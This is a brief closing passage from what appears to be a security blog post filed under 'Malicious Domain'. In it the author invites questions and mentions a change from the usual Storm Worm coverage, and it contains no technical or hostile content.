If you have any questions or comments regarding this posting as always feel free to contact me. I hope you enjoyed the change from the normal Storm Worm coverage. Thanks for visiting.

Posted in Malicious Domain | 2 Comments »